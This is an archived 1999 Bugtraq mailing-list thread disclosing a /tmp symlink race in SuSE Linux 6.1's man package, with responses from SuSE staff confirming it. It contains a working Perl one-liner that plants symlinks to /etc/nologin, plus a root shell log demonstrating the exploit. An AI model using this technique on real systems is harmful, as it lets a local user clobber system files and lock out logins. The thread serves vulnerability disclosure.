suse.6.1.tmp.symlinks.txt

`Date: Wed, 2 Jun 1999 11:01:32 +0200  
From: Thomas Fischbacher <[email protected]>  
To: [email protected]  
Subject: /tmp symlink problems in SuSE Linux 6.1  
  
I notified SuSE GmbH several weeks ago about this problem, but didn't get  
any response, therefore this post to Bugtraq.  
  
  
With SuSE Linux 6.1 there are still a few programs around which blindly  
create files in /tmp regardless of whether a symlink or something  
similarly evil already exists in that place. Among these programs are  
'man'and 'dvips'.  
  
  
Though it seems to be impossible by now to overwrite /etc/passwd with a  
plain simple /tmp/zman01234aaa symlink (didn't check if the source is  
race-condition free, though), one can still create arbitrary  
files which do funny things. Example:  
  
perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'  
  
  
--  
regards, [email protected] (o_  
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\  
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_  
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))  
  
-------------------------------------------------------------------------------  
  
Date: Fri, 4 Jun 1999 09:52:36 +0200  
From: Thomas Biege <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
Hi,  
we at SuSE could not reproduce this problem neither for  
man nor for dvips.  
  
Please send us a full list of "maybe" buggy tools, so we  
could evaluate them.  
  
Bye,  
Thomas  
  
PS: I never saw your email at your mailinglists.  
  
--  
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"  
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82  
  
-------------------------------------------------------------------------------  
  
Date: Fri, 4 Jun 1999 16:36:46 +0200  
From: Thomas Fischbacher <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
> Hi,  
> we at SuSE could not reproduce this problem neither for  
> man nor for dvips.  
  
Ok, here is a log of what I just did five minutes ago:  
(emacs -- M-x shell, btw.)  
  
  
brauneck:~ # whoami  
root  
brauneck:~ # cd /tmp  
brauneck:/tmp # cat /etc/SuSE-release  
SuSE Linux 6.1 (i386)  
VERSION = 6.1  
brauneck:/tmp # rpm -q man  
man-2.3.10-62  
brauneck:/tmp # md5sum /usr/bin/man  
b383967ce695352002f077680e375c62 /usr/bin/man  
brauneck:/tmp # su tf  
tf@brauneck:/tmp > export LS_OPTIONS=''  
tf@brauneck:/tmp > export LS_COLORS=''  
tf@brauneck:/tmp > ls zman*  
ls: zman*: No such file or directory  
tf@brauneck:/tmp > /bin/bash -c "echo $$"  
6056  
tf@brauneck:/tmp > # this gives me a current pid range  
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'  
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa  
lrwxrwxrwx 1 tf stud 12 Jun 4 16:28 /tmp/zman06123aaa -> /etc/nologin  
tf@brauneck:/tmp > ls -l /etc/nologin  
ls: /etc/nologin: No such file or directory  
tf@brauneck:/tmp > exit  
brauneck:/tmp # man mmap  
Reformatting mmap(2), please wait...  
WARNING: terminal is not fully functional  
  
  
  
  
MMAP(2) Linux Programmer's Manual MMAP(2)  
  
  
NAME  
mmap, munmap - map or unmap files or devices into memory  
  
SYNOPSIS  
#include <unistd.h>  
#include <sys/mman.h>  
  
#ifdef _POSIX_MAPPED_FILES  
  
void * mmap(void *start, size_t length, int prot , int  
flags, int fd, off_t offset);  
  
int munmap(void *start, size_t length);  
  
#endif  
  
DESCRIPTION  
  
  
brauneck:/tmp # ls -la /etc/nologin  
-rw-r--r-- 1 root root 4319 Jun 4 16:30 /etc/nologin  
brauneck:/tmp # ls /tmp/zman0* | wc -l  
999  
brauneck:/tmp # # Note that one link was removed!  
brauneck:/tmp #  
  
You see -- the problem definitely is not fiction! Come over to Munich and  
see yourself if you want.  
  
  
> Please send us a full list of "maybe" buggy tools, so we  
> could evaluate them.  
  
?  
  
> PS: I never saw your email at your mailinglists.  
  
?  
  
--  
regards, [email protected] (o_  
Thomas Fischbacher - http://www.cip.physik.uni-muenchen.de/~tf //\  
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y) V_/_  
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))  
  
-------------------------------------------------------------------------------  
  
Date: Sat, 5 Jun 1999 07:13:28 +0200  
From: Thomas Biege <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
On Fri, 4 Jun 1999, Thomas Fischbacher wrote:  
  
> > we at SuSE could not reproduce this problem neither for  
> > man nor for dvips.  
>  
> Ok, here is a log of what I just did five minutes ago:  
> (emacs -- M-x shell, btw.)  
  
[...]  
  
> You see -- the problem definitely is not fiction! Come over to Munich and  
> see yourself if you want.  
  
I don't think it's a fiction...  
... the fact is, that just old releases of SuSE 6.1 seem to be  
vulnerable, the newer releases didn't - man uses open(O_EXCL) and  
drops it's privileges.  
  
A customer told me, that the behavior you described just happens  
when he opens a big man page for the first time... we will check  
this as soon as posible.  
  
> > Please send us a full list of "maybe" buggy tools, so we  
> > could evaluate them.  
> ?  
  
In your first post to bugtraq you mentioned, that more tools have  
/tmp symlink problems... feel free to tell us about them.  
(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)  
  
Bye,  
Thomas  
--  
Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"  
Key fingerprint = E3 42 DA D1 3B 9C 23 D0 93 1F B8 2E 6B 9A 45 82  
  
-------------------------------------------------------------------------------  
  
Date: Sat, 5 Jun 1999 22:02:19 +0200  
From: Marc Heuse <[email protected]>  
To: [email protected]  
Subject: Re: /tmp symlink problems in SuSE Linux 6.1  
  
Hi,  
  
we confirmed the link vulnerablity in the man package.  
The culprit is zsoelim which creates the file without looking left and  
right. :-(  
  
All linux distributions using man 2.3.10 should be affected.  
  
A fixed package from us will be available soon.  
  
Greets,  
Marc  
--  
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg  
E@mail: [email protected] Function: Security Support & Auditing  
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"  
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C  
  
`